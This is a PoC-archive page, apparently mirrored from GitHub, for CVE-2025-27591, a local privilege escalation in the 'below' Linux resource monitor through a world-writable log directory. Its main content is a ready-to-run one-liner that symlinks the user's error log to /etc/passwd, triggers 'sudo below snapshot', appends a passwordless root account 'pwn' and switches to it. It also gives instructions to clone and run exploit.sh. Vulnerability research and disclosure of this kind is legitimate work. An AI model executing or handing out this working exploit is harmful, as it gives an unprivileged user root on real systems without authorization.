关联漏洞
标题:
below 安全漏洞
(CVE-2025-27591)
描述:below是Meta Incubator开源的一个现代 Linux 系统的资源监视器。 below v0.9.0之前版本存在安全漏洞,该漏洞源于创建了全局可写目录,可能导致通过符号链接攻击提升到root权限。
描述
Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
介绍
# Below - Local Privilege Escalation (CVE-2025-27591)
<br><br>
<div align="center">
<img width="250" src="https://raw.githubusercontent.com/facebookincubator/below/main/img/below_logo_horizontal.png" alt="below-logo"> <br><br>
<p>Below <= v0.8.1<br>
<b>Local Privilege Escalation via World-Writable Log Symlink</b> <br>
PoC Exploit<br>
</p>
<br><br>
<img src="https://www.zyenra.com/assets/img/below-pe.png">
</div>
---
### Introduction
`Below` versions <= 0.8.1 contains a critical local privilege escalation vulnerability (CVE-2025-27591).
Due to a misconfigured world-writable log directory (`/var/log/below/`) and insecure permission logic in the Rust codebase, a local attacker can symlink `error_<user>.log` to any root-owned file like `/etc/passwd`.
When `below snapshot` is executed with `sudo`, it forcibly sets mode `0666` on the log file and writes to it—even if it's a symlink.
This allows injection of a `root`-privileged user without password, leading to full root shell access.
---
### Usage
```bash
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh
````
**OR**
One-liner - (Copy, paste and execute)
```bash
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
```
---
### Environment
* Below <= v0.8.1
* Systemd-managed Linux (Ubuntu, Arch, Fedora, etc.)
* User in `sudo` group with `NOPASSWD` access to `/usr/bin/below *`
---
### Credits
Discovered and reported by Matthias Gerstner @ SUSE - [Security Advisory](https://security.opensuse.org/2025/03/12/below-world-writable-log-dir.html) <br>
PoC Exploit - Ravindu Wickramasinhge AKA [rvz](https://github.com/rvizx)
文件快照
[4.0K] /data/pocs/1b79049cdaf3701c2fd1fe6085bf0c6c67f195d3
├── [ 413] exploit.sh
└── [1.8K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。